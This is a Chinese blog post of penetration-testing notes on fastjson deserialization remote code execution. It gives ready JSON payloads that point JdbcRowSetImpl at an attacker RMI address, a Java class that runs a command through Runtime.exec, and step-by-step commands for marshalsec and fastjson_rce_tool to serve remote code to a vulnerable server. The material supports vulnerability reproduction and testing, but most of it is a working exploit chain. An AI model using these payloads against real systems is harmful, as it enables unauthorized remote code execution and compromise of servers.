fastjsion反序列化漏洞渗透测试笔记

本文原创地址：https://www.cnblogs.com/yunmuq/p/14268028.html

一、背景

fastjsion是阿里的开源Java工具：https://github.com/alibaba/fastjson

能快速地将对象序列化为json字符串，或进行反序列化

其速度和效率在同类型工具中遥遥领先，但曾被曝出存在高危漏洞

漏洞主要分布于1.2.68及以下的版本中，在将json反序列化为对象时，存在代码执行漏洞

如果一些项目未更新到最新版本，则存在安全漏洞

二、Payload

2.1 版本<1.2.25

{
      "@type":"com.sun.rowset.JdbcRowSetImpl",
      "dataSourceName":"rmi://localhost:1099/Exploit",
      "autoCommit":true
}

2.1 版本<1.2.48

{
      "x":{
            "@type":"java.lang.Class",
            "val":"com.sun.rowset.JdbcRowSetImpl"
      },
      "x":{
            "@type":"com.sun.rowset.JdbcRowSetImpl",
            "dataSourceName":"rmi://ip:port/Exploit",
            "autoCommit":true
      }
}

2.1 版本<1.2.68

1.2.47都是18年发布的版本了，上述两个payload是广为流传的版本，都是利用RMI、LDAP进行远程命令执行（RCE）

而1.2.68是20年新发布的版本，它修复了今年被爆出的安全漏洞

在1.2.68之前的版本，fastjson被发现还能利用异常进行攻击

但是利用难度较大，作者暂时没有找到好的利用链

目前发现的方法是

https://blog.csdn.net/caiqiiqi/article/details/106050079

{
      "content":{"$ref":"$x.systemInformation"},
      "x": {"@type":"java.lang.Exception","@type":"org.openqa.selenium.WebDriverException"}
}

#前提是需要WEB应用的classpath存在selenium-api

三、漏洞复现

3.1 搭建fastjson项目

想要复现漏洞最关键的要素是JDK版本，编译运行fastjson项目的jdk建议是 JDK8，作者使用 jdk-11.0.9 没成功，使用 jdk1.8.0_112 成功了

简单的验证很简单，无需spring项目和Tomcat，创建最简单的Java项目即可

觉得不想安装maven的，或觉得maven更改版本麻烦的，可以从maven中央库下载fastjson的jar包，并添设置项目属性加到依赖中，这里的版本最齐全：https://repo1.maven.org/maven2/com/alibaba/fastjson/

阿里云的镜像无法从浏览器访问，如果安装了maven可以使用maven项目

实现代码虽然不长，但是影响阅读，我放另一个页面中吧

>>>实现代码

准备好RMI、LDAP服务再运行

3.2 RMI、LDAP服务搭建

简单地说一下原理，作者自己也不是十分了解

当fastjson可以反序列化一些类时，怎么让服务器执行自己想要的代码呢

这就需要寻找一个利用链，com.sun.rowset.JdbcRowSetImpl的好处是，他是Java官方的类库

其中的lookup方法支持调用远程接口，我们把想要运行的代码放在远程接口中，触发服务器来调用即可

在前人已经为我们寻找好利用链之后，剩下的一步是搭建RMI、LDAP服务，自己写代码是比较困难的，好在这一步也有工具可用

3.2.1 使用marshalsec

不推荐，但是在网络上流传甚广

虽然免去写代码就能搭建RMI、LDAP服务器，但是需要安装python来提供http服务、需要maven来编译此工具，且编译的jdk版本需要在1.8.0_112及以下

这是项目地址：https://github.com/mbechler/marshalsec

远程调用的过程是，服务器通过RMI、LDAP访问我们的主机，我们的主机再转发到一个http端口上，把事先编译好的.class文件给服务器运行即可

具体步骤是：①在一个文件夹下编译

import java.lang.Runtime;
import java.lang.Process;

public class Exp {

    public Exp() {
        try{
            // 要执行的命令
            String commands = "calc";
            Process pc = Runtime.getRuntime().exec(commands);
            pc.waitFor();
        } catch(Exception e){
            e.printStackTrace();
        }

    }

    public static void main(String[] argv) {
        Exp e = new Exp();
    }

}

②使用 python -m http.server 80 在此文件夹下开启一个http服务

③使用 java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://ip/#Exp 运行RMIRefServer

④payload中的地址则是 ``rmi://ip` ，rmi默认端口是1099，http默认端口是80

3.2.2 使用fastjson_rce_tool

强烈推荐

相比marshalsec优点在于，不用编译，无需自己编写利用类Exploit，无需自己开启http服务，最重要的是不受JDK限制，使用JDK11也可

项目地址：https://github.com/wyzxxz/fastjson_rce_tool

使用方法：java -cp fastjson_tool.jar fastjson.HRMIServer IP port " 想要执行的命令 "

命令行会给出payload

不足是，当运行fastjson的Java版本是jdk11时，这边能收到服务器远程调用的请求，命令却无法被执行



本文参考文章：

https://zhuanlan.zhihu.com/p/157211675

https://www.cnblogs.com/sijidou/p/13121332.html



(๑•̀ㅂ•́)و✧

往期精彩文章推荐:

#topics #no-box-shadow-img { box-shadow: none; height: 120px }

《zookeeper未授权访问渗透测试及修复方法》

《安装nginx并安全地配置和启动》